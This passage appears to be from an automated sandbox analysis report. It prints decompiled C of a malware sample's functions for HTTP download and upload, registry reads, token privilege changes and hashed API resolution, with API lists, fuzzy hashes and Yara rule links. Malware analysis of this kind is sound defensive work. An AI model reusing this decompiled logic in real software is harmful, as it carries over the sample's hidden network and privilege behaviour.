						__eflags = 0;
					} else {
						goto L2;
					}
				}
				return _t38;
			}

0x00369ca0
0x00369cb1
0x00369cb6
0x00369cb9
0x00369cbb
0x00369cc4
0x00369cc6
0x00369cc8
0x00369d0a
0x00369d10
0x00369d1f
0x00369d29
0x00369d2e
0x00369d35
0x00369d37
0x00369d39
0x00369d8e
0x00369d8e
0x00369d8e
0x00369d3b
0x00369d40
0x00369d59
0x00369d5e
0x00369d70
0x00369d72
0x00369d74
0x00000000
0x00369d76
0x00369d7d
0x00369d82
0x00369d85
0x00369d87
0x00369d89
0x00369d89
0x00369d74
0x00369d97
0x00369da2
0x00369cca
0x00369ccf
0x00369ce8
0x00369cfa
0x00369cff
0x00369d02
0x00369d04
0x00369da6
0x00369da6
0x00000000
0x00000000
0x00000000
0x00369d04
0x00369db1

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 00369D70

Part of subcall function 0035BF50: LoadLibraryA.KERNEL32(?), ref: 0035C1A1

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: AdjustLibraryLoadPrivilegesToken
String ID:
API String ID: 1509250347-0
Opcode ID: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction ID: 0806bac0e8d024d3c567491649e51054f1672a706f6590a17d60b14c3aecad56
Opcode Fuzzy Hash: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction Fuzzy Hash: A221E7A2E4031536EB1236F4AC13F7F755C9F51716F050031FD18B91D2F6A1AA1885B2

Uniqueness

Uniqueness Score: -1.00%

Function 00351AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00351AF0(void* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t24;
				void* _t27;
				int _t31;
				signed char _t32;
				intOrPtr* _t33;
				intOrPtr _t38;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;
				void* _t58;

				_t24 = _a12;
				_t50 = _a16;
				_v24 = 0;
				_t48 =  <=  ? _t24 : 0xa00000;
				_t54 = 0;
				_v32 =  <=  ? _t24 : 0xa00000;
				_t63 = _t50;
				if(_t50 == 0) {
					while(1) {
						L2:
						_t6 = _t54 + 0x40000; // 0x40000
						_v20 = 0x40000;
						_t27 = E0036B220(_t64,  &_v24, _t6); // executed
						_t56 = _t55 + 8;
						_t65 = _t27;
						if(_t27 == 0) {
							break;
						}
						E0035BF50(_t65, 0x13, 0x7e90205);
						_t56 = _t56 + 8;
						_t42 = _v24;
						_t31 = InternetReadFile(_a4, _t42 + _t54, _v20,  &_v20); // executed
						if(_t31 == 0) {
							break;
						}
						_v28 = _t42;
						_t43 = _t50;
						_t51 = _v20;
						_t32 = E003555C0(_v20, 0);
						_t58 = _t56 + 8;
						_t67 = _t32 & 0x00000001;
						if((_t32 & 0x00000001) != 0) {
							_t33 = _a8;
							__eflags = _t33;
							if(_t33 == 0) {
								E0035B570(_v28);
								return 1;
							}
							 *_t33 = _v28;
							 *((intOrPtr*)(_t33 + 4)) = _t54;
							return 1;
						}
						_t38 = E003522E0(_t67, _t51 + _t54 + E00359D50(0x6fb39a5e), 0xbc79af2);
						_t56 = _t58 + 0xc;
						if(_t38 > _v32) {
							break;
						}
						_t54 = _t38;
						_t50 = _t43;
						_t64 = _t50;
						if(_t50 != 0) {
							goto L1;
						}
					}
					L8:
					E0035B570(_v24);
					__eflags = 0;
					return 0;
				}
				L1:
				_t40 = E0035BF50(_t63, 0, E00359D50(0x640dea48));
				_t56 = _t56 + 0xc;
				_t41 =  *_t40(_t50, 0);
				_t64 = _t41 - 0x102;
				if(_t41 != 0x102) {
					goto L8;
				}
				goto L2;
			}

0x00351af9
0x00351afc
0x00351b04
0x00351b14
0x00351b17
0x00351b19
0x00351b1c
0x00351b1e
0x00351b48
0x00351b48
0x00351b48
0x00351b4e
0x00351b5a
0x00351b5f
0x00351b62
0x00351b64
0x00000000
0x00000000
0x00351b6d
0x00351b72
0x00351b75
0x00351b86
0x00351b8a
0x00000000
0x00000000
0x00351b8c
0x00351b8f
0x00351b91
0x00351b97
0x00351b9c
0x00351b9f
0x00351ba1
0x00351bed
0x00351bf0
0x00351bf2
0x00351c03
0x00000000
0x00351c0b
0x00351bf7
0x00351bf9
0x00000000
0x00351bfc
0x00351bba
0x00351bbf
0x00351bc5
0x00000000
0x00000000
0x00351bc7
0x00351bc9
0x00351bcb
0x00351bcd
0x00000000
0x00000000
0x00351bd3
0x00351bd8
0x00351bdb
0x00351be3
0x00000000
0x00351be3
0x00351b20
0x00351b30
0x00351b35
0x00351b3b
0x00351b3d
0x00351b42
0x00000000
0x00000000
0x00000000

APIs

InternetReadFile.WININET(?,?,00040000,00040000), ref: 00351B86

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: fe2d8e86d6a9ed6cadc1c350434ca4be95c14ede4b75a955c6ddd89c59ccbf26
Instruction ID: d046d824762032882d354c50e0c06673ed0449cbce6a083846773575eed57362
Opcode Fuzzy Hash: fe2d8e86d6a9ed6cadc1c350434ca4be95c14ede4b75a955c6ddd89c59ccbf26
Instruction Fuzzy Hash: 10312EB5D0020A5BDB12DF94DC42FBFB7B5AF50306F150025EC04A7251F771A9198BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0036BAD0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188
networkCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0036BAD0(void* __eflags, void* _a4, char* _a8, char* _a12, void* _a16, long _a20, intOrPtr _a24) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				long _v32;
				char* _v36;
				char _v48;
				char _v54;
				char _v65;
				char _v97;
				char _v204;
				intOrPtr _t38;
				void* _t43;
				char* _t47;
				char* _t51;
				void* _t52;
				char* _t57;
				int _t58;
				intOrPtr* _t61;
				signed char _t65;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t74;
				signed char _t82;
				signed int _t85;
				void* _t99;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t115;
				void* _t117;
				intOrPtr _t126;

				_t125 = __eflags;
				_t38 = E00353750(_t125, E003520A0(__eflags, _a24, 0xfffffffb), _a24);
				_t126 = _t38;
				_v28 = _t38;
				E0036ED80( &_v48, _t126, E0035D0A0( &_v54, "HHb?",  &_v54));
				_v36 = E0036FCF0( &_v48);
				_v32 = 0;
				_t43 = E00359D50(0x647400bf);
				E0035BF50(_t126, _t43, E00359D50(0x6f9f943d));
				_t47 = E0035D0A0( &_v65, 0x3704e6,  &_v65);
				_t90 =  ==  ? 0x370779 : 0x3707f4;
				_t51 = E0035D0A0( &_v204,  ==  ? 0x370779 : 0x3707f4,  &_v204);
				_t115 = _t107 + 0x38;
				_t52 = HttpOpenRequestA(_a4, _t51, _a8, _t47, _a12,  &_v36, (0 | _t126 != 0x00000000) << 0x00000017 | 0x8404c700, 0); // executed
				_t104 = 0;
				if(_t52 == 0) {
					L9:
					E0036EC50( &_v48, _t134);
					return _t104;
				}
				_t105 = _a16;
				_t129 = _v28;
				_t99 = _t52;
				if(_v28 != 0) {
					_v20 = 0;
					_v24 = 4;
					_t68 = E0035BF50(_t129, 0x13, 0x85dc001);
					_t115 = _t115 + 8;
					_push( &_v24);
					_push( &_v20);
					_push(0x1f);
					_push(_t99);
					if( *_t68() != 0) {
						_t85 = _v20 ^ 0x00013380 | E00359D50(0x6475332c) & _v20;
						_t131 = _t85;
						_v20 = _t85;
						_t72 = E00359D50(0x647400bf);
						_t74 = E0035BF50(_t85, _t72, E00359D50(0x61c0d6ad));
						_t115 = _t115 + 0x14;
						 *_t74(_t99, 0x1f,  &_v20, 4);
					}
				}
				E0035BF50(_t131, 0x13, 0xb157a91);
				_t57 = E0035D0A0( &_v97, 0x370880,  &_v97);
				_t117 = _t115 + 0x10;
				_t58 = HttpSendRequestA(_t99, _t57, 0x13, _t105, _a20); // executed
				_t132 = _t58;
				if(_t58 == 0) {
					L8:
					E0035BF50(__eflags, 0x13, 0x714b685);
					InternetCloseHandle(_t99); // executed
					_t104 = 0;
					__eflags = 0;
				} else {
					_v20 = 0;
					_v24 = 4;
					_t61 = E0035BF50(_t132, 0x13, 0x249c261);
					_t82 = E003555C0( *_t61(_t99, 0x20000013,  &_v20,  &_v24, 0), 0) & 0x00000001;
					_t65 = E00355920( &_v24, _v20, E00359D50(0x64740064));
					_t117 = _t117 + 0x1c;
					if((_t82 & _t65) != 0) {
						goto L8;
					}
					_t134 = _t65 & 0x00000001 ^ _t82;
					if((_t65 & 0x00000001 ^ _t82) != 0) {
						goto L8;
					}
					_t104 = _t99;
				}
			}

0x0036bad0
0x0036baec
0x0036baf6
0x0036baf8
0x0036bb1e
0x0036bb2a
0x0036bb2d
0x0036bb39
0x0036bb52
0x0036bb65
0x0036bb7e
0x0036bb89
0x0036bb8e
0x0036bba3
0x0036bba5
0x0036bba9
0x0036bce1
0x0036bce4
0x0036bcf5
0x0036bcf5
0x0036bbaf
0x0036bbb2
0x0036bbb6
0x0036bbb8
0x0036bbba
0x0036bbc1
0x0036bbcf
0x0036bbd4
0x0036bbdd
0x0036bbde
0x0036bbdf
0x0036bbe1
0x0036bbe6
0x0036bc00
0x0036bc00
0x0036bc02
0x0036bc0a
0x0036bc23
0x0036bc28
0x0036bc34
0x0036bc34
0x0036bbe6
0x0036bc3d
0x0036bc50
0x0036bc55
0x0036bc60
0x0036bc62
0x0036bc64
0x0036bccd
0x0036bcd4
0x0036bcdd
0x0036bcdf
0x0036bcdf
0x0036bc66
0x0036bc66
0x0036bc6d
0x0036bc7b
0x0036bca5
0x0036bcb7
0x0036bcbc
0x0036bcc1
0x00000000
0x00000000
0x0036bcc5
0x0036bcc7
0x00000000
0x00000000
0x0036bcc9
0x0036bcc9

APIs

HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0036BBA3
HttpSendRequestA.WININET(00000000,00000000,00000013,?,00000000), ref: 0036BC60
InternetCloseHandle.WININET(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0036BCDD

Part of subcall function 0035BF50: LoadLibraryA.KERNEL32(?), ref: 0035C1A1

Strings

HHb?, xrefs: 0036BB0B

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: HttpRequest$CloseHandleInternetLibraryLoadOpenSend
String ID: HHb?
API String ID: 3912907948-3770701742
Opcode ID: 52562d10eae22efed652ce2b304709a2121ca4dab1d45f107341183d77609fa4
Instruction ID: 6fab39b46d752a08d13abb95e63b1c1effb2b39413d4aa2583b75cebd1c55118
Opcode Fuzzy Hash: 52562d10eae22efed652ce2b304709a2121ca4dab1d45f107341183d77609fa4
Instruction Fuzzy Hash: DB51CCB1D402197BEB11AAE0DC52FBF76689F10705F054034FD18AA292FB756B198BF2

Uniqueness

Uniqueness Score: -1.00%

Function 0035BA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0035BA60(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
				int _v20;
				signed char _t22;
				long _t24;
				void* _t26;
				long _t29;
				signed char _t30;
				char* _t34;
				long _t36;
				char** _t47;
				int _t49;
				char* _t51;
				void* _t52;
				void* _t54;
				void* _t58;
				void* _t60;

				_push(__eax);
				 *_a20 = 0;
				_t22 = E00365000(_a20, _t60, 0xffffffff);
				E0035BF50(_t60, 9, 0xda29a27);
				_t54 = _t52 + 0xc;
				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t49 = 0xffffffff;
				_t61 = _t24;
				if(_t24 == 0) {
					_t47 = _a20;
					_v20 = 0;
					_t26 = E00359D50(0x647400a5);
					E0035BF50(_t61, _t26, E00359D50(0x64f4976b));
					_t58 = _t54 + 0x10;
					_t29 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
					_t62 = _t29;
					if(_t29 == 0) {
						_t39 = _v20;
						_t30 = E003555C0(_v20, 0);
						_t58 = _t58 + 8;
						_t49 = 0;
						__eflags = _t30 & 0x00000001;
						if(__eflags == 0) {
							E00351460(__eflags, _t39, 4);
							_t34 = E00358290(_t39 + 4);
							_t58 = _t58 + 0xc;
							__eflags = _t34;
							if(__eflags == 0) {
								goto L2;
							} else {
								_t51 = _t34;
								E0035BF50(__eflags, 9, 0x8097c7);
								_t58 = _t58 + 8;
								_t36 = RegQueryValueExW(_a4, _a12, 0, _a16, _t51,  &_v20); // executed
								__eflags = _t36;
								if(__eflags == 0) {
									 *_t47 = _t51;
									_t49 = _v20;
								} else {
									E0035B570(_t51);
									_t58 = _t58 + 4;
									goto L2;
								}
							}
						}
					} else {
						L2:
						_t49 = 0xffffffff;
					}
					E0035BF50(_t62, 9, 0x3111c69);
					_t54 = _t58 + 8;
					RegCloseKey(_a4); // executed
				}
				return _t49;
			}

0x0035ba66
0x0035ba70
0x0035ba78
0x0035ba90
0x0035ba95
0x0035baa1
0x0035baa3
0x0035baa8
0x0035baaa
0x0035bab0
0x0035bab3
0x0035babf
0x0035bad8
0x0035badd
0x0035baf1
0x0035baf3
0x0035baf5
0x0035bafe
0x0035bb04
0x0035bb09
0x0035bb0c
0x0035bb0e
0x0035bb10
0x0035bb18
0x0035bb21
0x0035bb26
0x0035bb29
0x0035bb2b
0x00000000
0x0035bb2d
0x0035bb2d
0x0035bb36
0x0035bb3b
0x0035bb4e
0x0035bb50
0x0035bb52
0x0035bb5f
0x0035bb61
0x0035bb54
0x0035bb55
0x0035bb5a
0x00000000
0x0035bb5a
0x0035bb52
0x0035bb2b
0x0035baf7
0x0035baf7
0x0035baf7
0x0035baf7
0x0035bb6b
0x0035bb70
0x0035bb76
0x0035bb76
0x0035bb81

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 0035BAA1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0035BAF1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0035BB4E
RegCloseKey.KERNEL32(?), ref: 0035BB76

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 32c4ed6688c9152028d0edeabd9c31737bec14f445ec95b6198396d30a8bcb77
Instruction ID: ec5fbb15ed58c58693c566a80845f6c92a3a471d491950176064fcd62bf72989
Opcode Fuzzy Hash: 32c4ed6688c9152028d0edeabd9c31737bec14f445ec95b6198396d30a8bcb77
Instruction Fuzzy Hash: D431F8B2D002157BEB129E60DC42FAF7618AF14766F090120FD186A2E2F771A91887F2

Uniqueness

Uniqueness Score: -1.00%

Function 00368590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00368590(void* __eflags, intOrPtr _a4) {
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				union _TOKEN_INFORMATION_CLASS _t22;
				int _t23;
				signed char _t24;
				signed char _t30;
				void* _t31;
				int _t33;
				intOrPtr* _t35;
				signed char* _t36;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;
				signed char* _t43;
				void* _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t61;
				void* _t63;

				_t63 = __eflags;
				_v20 = 0;
				_t16 = E00359D50(0x647400a5);
				_t18 = E0035BF50(_t63, _t16, E00359D50(0x6b5f7e12));
				_t54 = _t51 + 0x10;
				_t19 =  *_t18(_a4, 8,  &_v20);
				_t64 = _t19;
				if(_t19 == 0) {
					_t49 = 0xffffffff;
					L12:
					return _t49;
				}
				E0035BF50(_t64, 9, 0xbd557e);
				_t22 = E00359D50(0x647400b5);
				_t42 =  &_v24;
				_t23 = GetTokenInformation(_v20, _t22, 0, 0, _t42); // executed
				_t24 = E003555C0(_t23, 0);
				_t57 = _t54 + 0x14;
				_t49 = 0xffffffff;
				_t65 = _t24 & 0x00000001;
				if((_t24 & 0x00000001) == 0) {
					L10:
					E0035BF50(_t71, 0, 0xb8e7db5);
					FindCloseChangeNotification(_v20); // executed
					goto L12;
				}
				_t30 = E003555C0( *((intOrPtr*)(E0035BF50(_t65, 0, E00359D50(0x68042b4e))))(), 0x7a);
				_t57 = _t57 + 0x14;
				if((_t30 & 0x00000001) == 0) {
					goto L10;
				}
				_t31 = E00358290(_v24);
				_t57 = _t57 + 4;
				_t67 = _t31;
				if(_t31 != 0) {
					_t47 = _t31;
					E0035BF50(_t67, 9, 0xbd557e);
					_t61 = _t57 + 8;
					_t33 = GetTokenInformation(_v20, 0x19, _t47, _v24, _t42); // executed
					_t49 = 0xffffffff;
					_t68 = _t33;
					if(_t33 != 0) {
						_t35 = E0035BF50(_t68, 9, 0x8847844);
						_t61 = _t61 + 8;
						_t36 =  *_t35( *_t47);
						if(_t36 != 0) {
							_t70 =  *_t36;
							_t43 = _t36;
							if( *_t36 != 0) {
								_v28 = E0035BF50(_t70, 9, 0x7a1c189);
								_t40 = E003522E0(_t70, ( *_t43 & 0x000000ff) + 0x57d8073d, 0x57d8073e);
								_t61 = _t61 + 0x10;
								_t41 = _v28( *_t47, _t40);
								_t71 = _t41;
								if(_t41 != 0) {
									_t49 =  *_t41;
								}
							}
						}
					}
					E0035B570(_t47);
					_t57 = _t61 + 4;
				}
			}

0x00368590
0x0036859c
0x003685a8
0x003685c1
0x003685c6
0x003685d0
0x003685d2
0x003685d4
0x003686f6
0x003686fb
0x00368704
0x00368704
0x003685e1
0x003685f3
0x003685fb
0x00368605
0x0036860a
0x0036860f
0x00368612
0x00368617
0x00368619
0x003686e0
0x003686e7
0x003686f2
0x00000000
0x003686f2
0x0036863c
0x00368641
0x00368646
0x00000000
0x00000000
0x0036864f
0x00368654
0x00368657
0x00368659
0x0036865f
0x00368668
0x0036866d
0x0036867a
0x0036867c
0x00368681
0x00368683
0x0036868c
0x00368691
0x00368696
0x0036869a
0x0036869c
0x0036869f
0x003686a1
0x003686b2
0x003686c3
0x003686c8
0x003686ce
0x003686d1
0x003686d3
0x003686d5
0x003686d5
0x003686d3
0x003686a1
0x0036869a
0x003686d8
0x003686dd
0x003686dd

APIs

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 00368605
FindCloseChangeNotification.KERNEL32(00000000), ref: 003686F2

Part of subcall function 0035BF50: LoadLibraryA.KERNEL32(?), ref: 0035C1A1

Part of subcall function 00358290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 003582E8

GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 0036867A

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: InformationToken$AllocateChangeCloseFindHeapLibraryLoadNotification
String ID:
API String ID: 2068138336-0
Opcode ID: 8dfbbf9bb2532201d34492a783012cdd4ff2419327182ad753990ba585490bcd
Instruction ID: dc05f53f86b4c027fbbef33578cbd14c025767b7d6612270d213a0d7a47c2949
Opcode Fuzzy Hash: 8dfbbf9bb2532201d34492a783012cdd4ff2419327182ad753990ba585490bcd
Instruction Fuzzy Hash: 8E3192A5D402053BEA1227B0AC13F7E75685F5575AF090520FE18BA2E2FA51AA1886B3

Uniqueness

Uniqueness Score: -1.00%

Function 0035A5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0035A5E0(WCHAR* _a4, void** _a8, void* _a12) {
				void* _v12;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				long _v32;
				void* _t21;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void** _t42;
				signed int _t43;
				void* _t46;
				void* _t49;
				void* _t51;
				void* _t52;

				_t42 = _a8;
				E0035BF50(_t52, 0, 0xad68947);
				_t46 = (_t43 & 0xfffffff8) - 0x10 + 8;
				_t40 =  ==  ? 1 : 7;
				_t21 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
				_t54 = _t21 - 0xffffffff;
				_t42[2] = _t21;
				if(_t21 == 0xffffffff) {
					L4:
					_t22 = 0;
				} else {
					_t24 = E0035BF50(_t54, 0, E00359D50(0x651fdb24));
					_t49 = _t46 + 0xc;
					_push( &_v20);
					_push(_t42[2]);
					if( *_t24() == 0) {
						L3:
						_t26 = E0035BF50(_t56, 0, 0xb8e7db5);
						 *_t26(_t42[2]);
						goto L4;
					} else {
						_t56 = _v24;
						if(_v24 == 0) {
							_t28 = _v28;
							__eflags = _t28;
							_t42[1] = _t28;
							if(__eflags == 0) {
								 *_t42 = 0;
								_t22 = 1;
							} else {
								E0035BF50(__eflags, 0, 0x1f8cae3);
								_t49 = _t49 + 8;
								_t30 = VirtualAlloc(0, _t42[1], 0x3000, 4); // executed
								__eflags = _t30;
								 *_t42 = _t30;
								if(__eflags == 0) {
									goto L3;
								} else {
									E0035BF50(__eflags, 0, 0xb7ac9a5);
									_t51 = _t49 + 8;
									_t32 = ReadFile(_t42[2],  *_t42, _t42[1],  &_v32, 0); // executed
									__eflags = _t32;
									if(__eflags == 0) {
										L12:
										_t33 = E0035BF50(__eflags, 0, 0xb1fd105);
										_t49 = _t51 + 8;
										 *_t33( *_t42, 0, 0x8000);
										goto L3;
									} else {
										__eflags = _v32 - _t42[1];
										if(__eflags != 0) {
											goto L12;
										} else {
											_t22 = 1;
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				return _t22;
			}

0x0035a5eb
0x0035a5f8
0x0035a5fd
0x0035a60e
0x0035a620
0x0035a622
0x0035a625
0x0035a628
0x0035a66b
0x0035a66b
0x0035a62a
0x0035a63a
0x0035a63f
0x0035a646
0x0035a647
0x0035a64e
0x0035a657
0x0035a65e
0x0035a669
0x00000000
0x0035a650
0x0035a650
0x0035a655
0x0035a674
0x0035a678
0x0035a67a
0x0035a67d
0x0035a6d3
0x0035a6d9
0x0035a67f
0x0035a686
0x0035a68b
0x0035a69a
0x0035a69c
0x0035a69e
0x0035a6a0
0x00000000
0x0035a6a2
0x0035a6a9
0x0035a6ae
0x0035a6c0
0x0035a6c2
0x0035a6c4
0x0035a6dd
0x0035a6e4
0x0035a6e9
0x0035a6f5
0x00000000
0x0035a6c6
0x0035a6ca
0x0035a6cd
0x00000000
0x0035a6cf
0x0035a6cf
0x0035a6cf
0x0035a6cd
0x0035a6c4
0x0035a6a0
0x00000000
0x00000000
0x00000000
0x0035a655
0x0035a64e
0x0035a673

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0035A620
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0035A69A
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0035A6C0

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction ID: 85dc42114dd2f9614f976265f686bfe4232100c590944a3a38436d90de2782dd
Opcode Fuzzy Hash: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction Fuzzy Hash: A2313971640701BBE7226B60DC03F5672909F40B03F154928FEADAA1E0E7B1F508AB73

Uniqueness

Uniqueness Score: -1.00%

Function 0035ABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0035ABF0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
				void* _t11;
				signed char _t12;
				long _t14;
				signed int _t29;
				void* _t38;

				_t12 = E00365000(_t11, _t38, 0xffffffff);
				E0035BF50(_t38, 9, 0xda29a27);
				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t29 = 0xffffffff;
				_t39 = _t14;
				if(_t14 == 0) {
					E0035BF50(_t39, 9, 0x8097c7);
					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
					asm("sbb esi, esi");
					_t29 =  !0x00000000 | _a24;
					E0035BF50( !0x00000000, 9, 0x3111c69);
					RegCloseKey(_a4); // executed
				}
				return _t29;
			}

0x0035abfe
0x0035ac16
0x0035ac27
0x0035ac29
0x0035ac2e
0x0035ac30
0x0035ac42
0x0035ac56
0x0035ac5d
0x0035ac61
0x0035ac6b
0x0035ac76
0x0035ac76
0x0035ac7e

APIs

RegOpenKeyExW.KERNEL32(00000000,?,00000000,?,?), ref: 0035AC27
RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 0035AC56

Part of subcall function 0035BF50: LoadLibraryA.KERNEL32(?), ref: 0035C1A1

RegCloseKey.KERNEL32(?,?,?,?,?), ref: 0035AC76

Memory Dump Source

Source File: 0000000C.00000002.563071238.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: true

Similarity

API ID: CloseLibraryLoadOpenQueryValue
String ID:
API String ID: 3751545530-0
Opcode ID: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction ID: e0cd35fbbfb7eb29fa53ce984f2e6c9ed9550a6fa6f67150762e838d74531252
Opcode Fuzzy Hash: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction Fuzzy Hash: 3101B9779402287FDB009E94DC42F9B7718DB45B66F050224FE28A72D1E661BD1587F1

Uniqueness

Uniqueness Score: -1.00%

Function 0036B390, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0036B390(void* __eflags, intOrPtr* _a4, char _a8) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v74;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t29;
				signed char _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				intOrPtr* _t37;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t43;
				intOrPtr* _t45;
				void* _t47;
				void* _t48;
				signed char _t49;
				intOrPtr* _t50;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t68;

				_t1 =  &_a8; // 0x37285c
				_t55 =  *_t1;
				_t26 = E0035BF50(__eflags, 9, 0xc654d62);
				_t62 = _t61 + 8;
				_t27 =  *_t26(_t55, 1);
				_t56 = 0;
				_t75 = _t27;
				if(_t27 != 0) {
					_t29 = E0035BF50(_t75, 9, 0x4a9139c);
					_t31 = E003555C0( *_t29(_t55, 1, 0, 0), 0);
					_t64 = _t62 + 0x10;
					if((_t31 & 0x00000001) == 0) {
						_t50 = _a4;
						_v20 = 0;
						_t32 = E00351C20();
						_t77 = _t32 - 3;
						if(_t32 < 3) {
							__eflags = _t32 - 2;
							if(__eflags != 0) {
								goto L10;
							} else {
								_t33 = E0035BF50(__eflags, 9, 0xabc78f7);
								_t65 = _t64 + 8;
								_t34 =  *_t33(0x3710d8, 1,  &_v20, 0);
								__eflags = _t34;
								if(_t34 == 0) {
									goto L10;
								} else {
									goto L7;
								}
							}
						} else {
							_t43 = E00359D50(0x647400a5);
							_t45 = E0035BF50(_t77, _t43, E00359D50(0x6ec8785b));
							_t47 = E00357200(0x3710b0,  &_v74);
							_t48 =  *_t45(_t47, 1,  &_v20, 0); // executed
							_t49 = E003555C0(_t48, 0);
							_t65 = _t64 + 0x20;
							if((_t49 & 0x00000001) == 0) {
								L7:
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t35 = E00359D50(0x647400a5);
								_t37 = E0035BF50(__eflags, _t35, E00359D50(0x6cdc2320));
								_t68 = _t65 + 0x10;
								__eflags =  *_t37(_v20,  &_v28,  &_v32,  &_v24);
								if(__eflags == 0) {
									L9:
									_t39 = E0035BF50(__eflags, 0, 0x982abe5);
									 *_t39(_v20);
									goto L10;
								} else {
									_t41 = E0035BF50(__eflags, 9, 0x4a8239c);
									_t68 = _t68 + 8;
									__eflags =  *_t41(_t55, _v28, _v32, _v24);
									if(__eflags == 0) {
										goto L9;
									}
								}
							} else {
								L10:
								_v20 = 0xffffffff;
							}
						}
						if(_t50 != 0) {
							 *_t50 = 0xc;
							 *((intOrPtr*)(_t50 + 4)) = _t55;
							 *((intOrPtr*)(_t50 + 8)) = 0;
						}
						_t56 = _v20;
					}
				}
				return _t56;
			}

0x0036b399
0x0036b399
0x0036b3a3
0x0036b3a8
0x0036b3ae
0x0036b3b0
0x0036b3b2
0x0036b3b4
0x0036b3c1
0x0036b3d5
0x0036b3da
0x0036b3df
0x0036b3e5
0x0036b3e8
0x0036b3ef
0x0036b3f4
0x0036b3f7
0x0036b451
0x0036b454
0x00000000
